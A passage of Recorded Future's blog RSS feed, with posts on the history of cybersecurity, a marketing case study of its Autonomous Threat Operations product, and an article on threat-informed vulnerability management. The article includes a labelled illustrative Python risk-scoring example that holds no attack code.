          <li><a href="https://www.staysafeonline.org/articles/the-evolution-of-ethical-hacking-from-curiosity-to-cybersecurity">The Evolution of Ethical Hacking: From Curiosity to Cybersecurity</a></li>
        </ul>
        <h2>The 1970s: Networking and the First "Worm"</h2>
        <p>The 1970s transformed cybersecurity from a localized concern into a networked reality. The launch of ARPANET, the precursor to the modern internet, enabled researchers to share resources across distances but also opened a doorway for autonomous software to travel between systems.</p>
        <p>In 1971, this potential was realized with Creeper, the world's first self-replicating network program. While harmless, its ability to move across the network and display messages was a revolutionary proof of concept. In response, programmer Ray Tomlinson created Reaper - the first antivirus program - specifically designed to hunt and delete Creeper. This decade also saw the rise of Kevin Mitnick, whose exploits in the 1980s showed that psychological manipulation, or social engineering, could bypass even the strongest technical barriers.</p>
        <p>Key Characteristics of This Era:</p>
        <ul>
          <li>Network Connectivity: ARPANET's birth created the first interconnected digital landscape.</li>
          <li>The First Worm: Creeper demonstrated that programs could self-propagate autonomously.</li>
          <li>The First Antivirus: Reaper established the "detect and delete" model of digital defense.</li>
          <li>Social Engineering: Early hacks highlighted that human error is often the weakest link in the security chain.</li>
        </ul>
        <p>This era proved that once computers started talking to each other, the "locked door" was no longer enough to keep an intruder out.</p>
        <ul>
          <li><a href="https://ybpyt.neocities.org/thecreepervirus">The Creeper Virus</a></li>
          <li><a href="https://pandorafms.com/blog/creeper-and-reaper/">Creeper and Reaper: The First Virus and Anti-Virus</a></li>
        </ul>
        <h2>The 1980s: Personal Computers and the Birth of an Industry</h2>
        <p>The 1980s shifted computing from sterile labs to homes and offices. This explosion of connectivity via modems and floppy disks turned theoretical threats into a global reality, giving rise to the first commercial antivirus software and formal incident response teams like CERT.</p>
        <p>Key Characteristics of This Era:</p>
        <ul>
          <li>Wild Malware: Viruses like Elk Cloner and the Brain Virus moved beyond labs to infect personal computers worldwide.</li>
          <li>The Morris Worm (1988): The first major network-wide disruption, leading to the first conviction under the Computer Fraud and Abuse Act (Robert Tappan Morris).</li>
          <li>Cyber Espionage: Markus Hess's breach of military systems for Soviet intelligence proved that digital networks had massive geopolitical stakes.</li>
          <li>Ransomware Roots: The AIDS Trojan introduced the world to the concept of holding digital files hostage for payment.</li>
        </ul>
        <p>The 1980s proved that as computers became personal, the threats against them became universal.</p>
        <ul>
          <li><a href="https://www.ttu.edu/cybersecurity/lubbock/digital-life/digital-identity/malware.php">What is Malware?</a></li>
          <li><a href="https://cyber.tap.purdue.edu/blog/articles/viruses-of-the-80s/">Computer Viruses of the 80s</a></li>
        </ul>
        <h2>The 1990s: The Public Internet and Exploding Threats</h2>
        <p>As the World Wide Web went mainstream, the attack surface grew exponentially. This was the era of the "Macro Virus," where malicious code hid in everyday documents, and the dominance of Windows made it a universal target for hackers.</p>
        <p>Key Characteristics of This Era:</p>
        <ul>
          <li>Mass-Mailers: The Melissa virus demonstrated how email could be weaponized to clog global servers in hours.</li>
          <li>The Encryption Standard: Netscape's SSL (1995) laid the foundation for secure online commerce and HTTPS.</li>
          <li>Network Fortification: Firewalls became standard equipment as businesses scrambled to block external intrusions.</li>
          <li>Legal Frameworks: Organizations like the EFF began fighting for digital privacy and standardized cybercrime laws.</li>
        </ul>
        <p>This decade transformed <a href="https://www.recordedfuture.com/services/analyst-on-demand">cybersecurity services</a> from a technical niche into a vital pillar of global commerce and law.</p>
        <ul>
          <li><a href="https://www.sei.cmu.edu/documents/540/2000_019_001_497190.pdf">The Melissa Virus: FAQs</a></li>
          <li><a href="https://cyberpills.news/item/2054-online-security-the-transformation-from-ssl-to-tls-and-their-historical-impact.html">The History and Impact of Netscape's SSL</a></li>
        </ul>
        <h2>The 2000s: Professionalized Crime and Mature Defenses</h2>
        <p>The 2000s saw cybercrime scale into a high-profit industry. High-speed broadband and the rise of e-commerce meant that a single breach could compromise tens of millions of records, forcing the industry to develop more sophisticated authentication and <a href="https://www.recordedfuture.com/services/managed-monitoring">monitoring</a> tools.</p>
        <p>Key Characteristics of This Era:</p>
        <ul>
          <li>Massive DDoS Attacks: "Mafiaboy" proved that even giants like Amazon and eBay could be paralyzed by flooded traffic.</li>
          <li>Social Engineering at Scale: The ILOVEYOU virus infected millions by exploiting human curiosity and trust.</li>
          <li>Data Breach Epidemics: The TJX breach accelerated the adoption of strict data security standards like PCI DSS.</li>
          <li>Encrypted Ransomware: In 2006, ransomware began using RSA encryption, making it nearly impossible to recover files without a key.</li>
        </ul>
        <p>As attacks became more lucrative, the defensive industry responded with the first generation of modern security standards and behavioral analysis.</p>
        <ul>
          <li><a href="https://www.bcs.org/articles-opinion-and-research/25-years-ago-the-iloveyou-worm/">25 Years Ago: The ILOVEYOU Worm</a></li>
          <li><a href="https://whyy.org/segments/iloveyou-how-a-students-email-virus-exploited-human-nature/">How a Computer Science Student Created One of the First Email Viruses That Spread by Preying on Human Nature</a></li>
        </ul>
        <h2>The 2010s: Nation-States and Digital Weapons</h2>
        <p>The 2010s shifted the focus from criminal profit to national security. Cybersecurity became a theater of war, with governments deploying digital weapons to destroy physical infrastructure and influence global politics.</p>
        <p>Key Characteristics of This Era:</p>
        <ul>
          <li>The Stuxnet Worm: The first acknowledged cyberweapon designed to cause physical destruction to industrial equipment.</li>
          <li>The Snowden Leaks: Exposed the massive scale of global surveillance, sparking a decade-long debate on privacy.</li>
          <li>Automation and AI: Machine learning began appearing on both sides - defenders used it for detection, while attackers used it to find flaws.</li>
          <li>Global Ransomware: WannaCry and NotPetya showed how automated exploits could cripple hospitals and shipping lines across 150 countries.</li>
        </ul>
        <p>By the end of the decade, it was clear that a line of code could be just as impactful as a physical weapon.</p>
        <ul>
          <li><a href="https://swisscyberinstitute.com/blog/6-worst-computer-viruses-in-history/">Top 12 Worst Computer Viruses in History (&amp; What They Taught Us About Cybersecurity)</a></li>
          <li><a href="https://www.ibm.com/think/x-force/wannacry-worm-ransomware-changed-cybersecurity">Wannacry: How the Widespread Ransomware Changed Cybersecurity</a></li>
        </ul>
        <h2>The 2020s: AI Threats and Modern Threat Intelligence</h2>
        <p>Today, the line between the physical and digital worlds has vanished. With remote work and cloud-native businesses, security is now a proactive game of "Threat Intelligence", which involves predicting and neutralizing an adversary's move before they even make it.</p>
        <p>Key Characteristics of This Era:</p>
        <ul>
          <li>Targeting Infrastructure: Attacks on power grids and water systems have raised the stakes from financial loss to public safety.</li>
          <li>AI-Powered Attacks: Adversaries use AI to create deepfakes and hyper-personalized phishing at speeds humans can't match.</li>
          <li>Predictive Defense: Modern strategy relies on Threat Intelligence, using AI to analyze patterns and stop attacks in their tracks.</li>
          <li>Cloud &amp; Remote Security: The shift away from traditional offices has forced a move toward "Zero Trust" security models.</li>
        </ul>
        <p>The ongoing battle between human ingenuity and artificial intelligence now defines the frontlines of our digital existence.</p>
        <ul>
          <li><a href="https://learn.microsoft.com/en-us/security/zero-trust/zero-trust-overview">What is a "Zero Trust" Security Model?</a></li>
          <li><a href="https://extension.harvard.edu/blog/ai-and-the-future-of-cybersecurity/#How-AI-Enables-the-Next-Generation-of-Cyber-Attacks-">AI and the Future of Cybersecurity</a></li>
          <li><a href="https://www.ncsc.gov.uk/report/impact-ai-cyber-threat-now-2027">The Impact of AI on Cyber Threat From Now to 2027</a></li>
          <li><a href="https://www.ie.edu/insights/ideas-to-shape-the-future/idea/what-is-the-future-of-cybersecurity/">What Is the Future of Cybersecurity?</a></li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_14b1a1ef4390d02385a641660591272ebb0215a17.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team | Recorded Future]]></title>
            <link>https://www.recordedfuture.com/blog/autonomous-threat-operations-in-action</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/autonomous-threat-operations-in-action</guid>
            <pubDate>Sun, 01 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article explores how Recorded Future served as Customer Zero for Autonomous Threat Operations, testing the new solution within our own SOC to validate its real-world impact before releasing it to the public. The article reveals how the technology transformed inconsistent, analyst-dependent threat hunting into unified, automated operations—enabling junior analysts to run 15–20 hunts weekly and allowing our CISO to launch comprehensive network hunts in five minutes in response to critical threats like Salt Typhoon. By understanding these outcomes, security leaders can see how autonomous threat hunting empowers teams at every skill level to shift from reactive to proactive defense.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li>Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.</li>
          <li>Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.</li>
          <li>Team members now run 15-20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.</li>
          <li>During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.</li>
          <li>A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.</li>
        </ul>
        <h2>Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team</h2>
        <p>The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.</p>
        <p>That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.</p>
        <p>The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.</p>
        <h2><strong>The challenge: Inconsistent and analyst-dependent threat hunting</strong></h2>
        <p>Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."</p>
        <p>This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.</p>
        <h2><strong>The transformation: Unified, repeatable threat hunting</strong></h2>
        <p>Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."</p>
        <p>The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."</p>
        <p>Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."</p>
        <h2><strong>Real-world impact: Upskilling junior analysts and enabling rapid response</strong></h2>
        <p>According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.</p>
        <p>First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.</p>
        <p>Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.</p>
        <p>Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background,” he says. “We get our results, and then they can do research in the app to shore up the findings."</p>
        <p>Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.</p>
        <p>That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.</p>
        <h2><strong>The advantage of a single pane of glass</strong></h2>
        <p>Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."</p>
        <p>This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.</p>
        <h2><strong>Why the Customer Zero experience matters</strong></h2>
        <p>Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.</p>
        <p>Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."</p>
        <p>We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.</p>
        <p><strong>Learn more about Autonomous Threat Operations by clicking</strong> <strong><a href="https://www.recordedfuture.com/products/autonomous-threat-operations">here</a>, or start operationalizing your threat intelligence now by booking a</strong> <strong><a href="https://go.recordedfuture.com/ato-demo.html?__utma=150831654.1091255729.1769524153.1769524153.1769524153.1&amp;__utmb=150831654.0.10.1769524153&amp;__utmc=150831654&amp;__utmx=-&amp;__utmz=150831654.1769524153.1.1.utmcsr=(direct)%7Cutmccn=(direct)%7Cutmcmd=(none)&amp;__utmv=-&amp;__utmk=14649591">custom demo</a>.</strong></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1a3ded09023847b846727759f0086351655ddf92a.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat and Vulnerability Management in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/threat-and-vulnerability-management</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-and-vulnerability-management</guid>
            <pubDate>Fri, 16 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Understand the future of threat and vulnerability management (TVM). Learn what TVM is, why traditional tools fail, and how intelligence is essential in today’s landscape.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li><strong>Traditional vulnerability management tools can no longer keep up</strong> with the speed of modern exploitation—threat context is now mandatory.</li>
          <li><strong>Threat and Vulnerability Management (TVM) systems</strong> unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.</li>
          <li><strong>Static CVSS scores fail to reflect exploitation likelihood</strong>; intelligence-driven, dynamic risk scoring is essential in 2026.</li>
          <li><strong>Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste</strong>, enhancing detection and remediation while reducing alert fatigue.</li>
        </ul>
        <h2>Why Threat and Vulnerability Management Must Evolve in 2026</h2>
        <p>Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.</p>
        <p>Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.</p>
        <p>Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert-fatigue.</p>
        <p>In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using <a href="https://www.recordedfuture.com/threat-intelligence">intelligence-driven TVM systems</a>.</p>
        <h2>The Core Problem: Alert Fatigue and Prioritization Failure</h2>
        <p>As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.</p>
        <p>Traditionally, organizations have leaned on the standard CVSS (Common Vulnerability Scoring System) to meet these <a href="https://www.recordedfuture.com/blog/addressing-the-vulnerability-prioritization-challenge">challenges of prioritization</a>. CVSS is an open, standardized framework that rates the severity of a vulnerability with a numerical score derived from exploitability metrics (attack vector, attack complexity, privileges required, user interaction) and impact metrics (confidentiality, integrity, availability). Organizations use CVSS scores to rank remediation work and to compare vulnerabilities consistently across systems and vendors.</p>
        <p>However, a CVSS base score measures theoretical severity, not exploitation likelihood. CVSS does define temporal (v3.x) and threat (v4.0) metrics for exploit maturity, but the base scores that scanners and the NVD publish leave them out, so the number on a scan report rarely answers the questions that actually drive a prioritization decision:</p>
        <ul>
          <li>Is exploit code available?</li>
          <li>Is the vulnerability actively exploited?</li>
          <li>Are threat actors discussing or operationalizing it?</li>
        </ul>
        <p>As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.</p>
        <p>At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.</p>
        <p>Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:</p>
        <ul>
          <li>Operational drag and burnout</li>
          <li>Delayed remediation of truly dangerous vulnerabilities</li>
          <li>Increased business risk despite increased effort</li>
          <li>Fractured security operations</li>
        </ul>
        <p>Both individually, and in the aggregate, these side-effects come at a significant detriment to organizational security. And as the number and diversity of CVEs continues to expand, the greater that cost becomes. Moving forward, organizations must find a better way.</p>
        <h2>The Evolving Threat Landscape Demands a New Approach</h2>
        <p>Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.</p>
        <p>Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.</p>
        <p>At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an <a href="https://www.recordedfuture.com/blog/threat-intelligence-and-vulnerability-management">integrated approach</a> between the two.</p>
        <p>In short, a vulnerability is a technical weakness, while a threat is an actor, campaign or event at work exploiting that weakness. In order to be truly effective, modern threat vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.</p>
        <h2>What Is Threat and Vulnerability Management (TVM)?</h2>
        <p>Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:</p>
        <ul>
          <li>Active exploitation</li>
          <li>Threat actor behavior</li>
          <li>Asset criticality</li>
        </ul>
        <p>TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and closed-loop remediation and validation.</p>
        <p>This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.</p>
        <h2>The Five Core Pillars of Modern TVM Systems</h2>
        <p>As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where new vulnerabilities are disclosed daily, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equal. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.</p>
        <p><strong>1. Continuous Asset Discovery &amp; Inventory</strong></p>
        <p>Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.</p>
        <p>Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.</p>
        <p><strong>2. Vulnerability Assessment &amp; Scoring</strong></p>
        <p>TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.</p>
        <p><strong>3. External Threat Context Enrichment</strong></p>
        <p>This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.</p>
        <p>Vulnerabilities are mapped to known threat actors, active exploitation, and <a href="https://attack.mitre.org/">MITRE ATT&amp;CK®</a> techniques, ultimately transforming raw findings into actionable intelligence.</p>
        <p><strong>4. Risk-Based Prioritization (RBVM)</strong></p>
        <p>Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.</p>
        <p><strong>5. Automated Remediation &amp; Verification</strong></p>
        <p>Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.</p>
        <p>These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.</p>
        <h2>Stop Patching Everything — Use Intelligence to Prioritize Real Risk</h2>
        <p>The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.</p>
        <p>Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.</p>
        <p>Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.</p>
        <p>The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.</p>
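        <p>The following is an added example, not code from the original post or from Recorded Future, that makes the contrast between “most severe” and “most dangerous” concrete: it scores the CVSS-only view against a dynamic score that folds in exploitation evidence, asset criticality, and internet exposure, and re-scores a finding when exploitation is later confirmed. The findings, asset attributes, and weights are all constructed assumptions; the CVE identifiers are placeholders, and the formula is illustrative rather than Recorded Future’s Risk Score or any vendor’s method.</p>

```python
"""Added example: rank findings by threat context instead of CVSS alone.

Findings are constructed and the weights are illustrative assumptions; this is
not Recorded Future's Risk Score or any vendor's formula.
"""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Finding:
    cve: str                        # placeholder IDs below, not real CVE numbers
    cvss_base: float                # static severity, 0.0-10.0
    asset: str
    asset_criticality: int          # 1 (low) .. 5 (crown jewel); assumed inventory attribute
    internet_facing: bool           # assumed attack-surface attribute
    in_kev: bool = False            # confirmed exploitation (e.g. CISA KEV listing)
    exploit_public: bool = False    # public PoC or weaponized exploit observed
    actor_interest: bool = False    # discussed or operationalized by threat actors


def threat_evidence(f: Finding) -> float:
    """Strongest evidence wins: confirmed exploitation > public exploit > actor chatter."""
    if f.in_kev:
        return 1.0
    if f.exploit_public:
        return 0.6
    if f.actor_interest:
        return 0.3
    return 0.0


def risk_score(f: Finding) -> float:
    """0-100 dynamic score; severity is one of four weighted inputs (weights are assumptions)."""
    severity = f.cvss_base / 10.0
    exposure = 1.0 if f.internet_facing else 0.3
    criticality = f.asset_criticality / 5.0
    return round(100 * (0.20 * severity
                        + 0.50 * threat_evidence(f)
                        + 0.15 * exposure
                        + 0.15 * criticality), 1)


def prioritize(findings: list) -> list:
    """Remediation order by dynamic risk, highest first: [(cve, score), ...]."""
    ranked = sorted(findings, key=risk_score, reverse=True)
    return [(f.cve, risk_score(f)) for f in ranked]


def cvss_order(findings: list) -> list:
    """What a severity-only programme does: patch the highest CVSS first."""
    return [f.cve for f in sorted(findings, key=lambda f: f.cvss_base, reverse=True)]


def rescore_after_kev_listing(f: Finding) -> tuple:
    """Same finding before and after exploitation is confirmed: the score moves, CVSS does not."""
    return risk_score(f), risk_score(replace(f, in_kev=True))


# Constructed sample: an unexploited critical on an internal build box, a weaponized
# high on the VPN edge, a PoC-only high on an HR database, and a KEV-listed medium
# on a public web server.
SAMPLE = [
    Finding("CVE-EXAMPLE-1", 9.8, "build-server-03", 2, internet_facing=False),
    Finding("CVE-EXAMPLE-2", 7.5, "vpn-gateway-01", 5, internet_facing=True,
            in_kev=True, exploit_public=True, actor_interest=True),
    Finding("CVE-EXAMPLE-3", 8.8, "hr-db-02", 3, internet_facing=False,
            exploit_public=True),
    Finding("CVE-EXAMPLE-4", 5.3, "www-marketing", 2, internet_facing=True,
            in_kev=True),
]

if __name__ == "__main__":
    print("CVSS-only order :", cvss_order(SAMPLE))
    print("Risk-based order:", prioritize(SAMPLE))
    print("build server before/after KEV listing:", rescore_after_kev_listing(SAMPLE[0]))
```

        <p>The severity-only order patches the 9.8 on the internal build server first; the risk-based order puts the KEV-listed VPN edge flaw and even the 5.3 on the public web server ahead of it, and the build-server finding jumps from the bottom of the queue only once exploitation is confirmed. In production the evidence fields come from a vulnerability intelligence feed and the asset fields from the inventory, which is why the asset discovery and enrichment pillars have to be in place before this kind of scoring means anything.</p>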
        <h2>See Your Risk Like an Attacker: The Full Attack Surface View</h2>
        <p>In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.</p>
        <ol>
          <li><strong>The Visibility Gap:</strong> Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.</li>
          <li><strong>Attack Surface Intelligence Explained:</strong> Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.</li>
          <li><strong>Connecting the Dots with Vulnerability Tools:</strong> When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.</li>
        </ol>
        <h2>Three Strategic Recommendations for Security Leaders</h2>
        <p>Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.</p>
        <p><strong>1. Bridge the Gap Between Security and IT</strong></p>
        <p>Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.</p>
        <p><strong>2. Embrace Automation and Workflow Integration</strong></p>
        <p>Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.</p>
        <p><strong>3. Measure What Matters — Time-to-Remediate (TTR)</strong></p>
        <p>Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.</p>
        <h2>The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy</h2>
        <p>Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.</p>
        <p>Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.</p>
        <p>Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.</p>
        <p>By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the primary difference between a Vulnerability and a Threat?</h3>
              <p>A Vulnerability is a weakness or flaw in an asset (e.g., unpatched software, misconfiguration) that could be exploited. A Threat is a person, group, or event (e.g., a threat actor, a piece of malware) that has the potential to exploit that vulnerability to cause harm.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the biggest challenge facing traditional vulnerability management programs today?</h3>
              <p>The biggest challenge is alert fatigue and prioritization noise. Traditional programs generate an overwhelming number of vulnerabilities, often relying only on the technical severity score (like CVSS). This leads security teams to waste time patching low-risk flaws while critical, actively exploited vulnerabilities remain unaddressed.</p>
            </div>
          </div>
          <div>
            <div>
